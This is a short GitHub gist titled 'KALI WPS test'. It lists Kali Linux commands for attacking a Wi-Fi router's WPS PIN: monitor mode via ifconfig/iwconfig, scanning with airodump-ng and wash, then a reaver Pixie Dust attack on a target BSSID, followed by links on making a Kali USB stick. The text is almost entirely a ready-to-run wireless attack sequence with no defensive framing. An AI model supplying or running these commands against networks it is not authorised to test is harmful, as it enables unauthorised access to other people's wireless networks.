-
-
Save a-mishra/eb80afac9944cddc07c9eec52a886527 to your computer and use it in GitHub Desktop.
KALI WPS test
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ifconfig wlan0 down | |
| iwconfig wlan0 mode monitor | |
| ifconfig wlan0 up | |
| airodump-ng wlan0 | |
| wash -i wlan0 -C | grep <SSID> | |
| reaver -i wlan0 -b <your-MAC> -K 1 -w -vv | |
| Research: | |
| * http://docs.kali.org/downloading/kali-linux-live-usb-install | |
| * http://sourceforge.net/projects/win32diskimager/ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment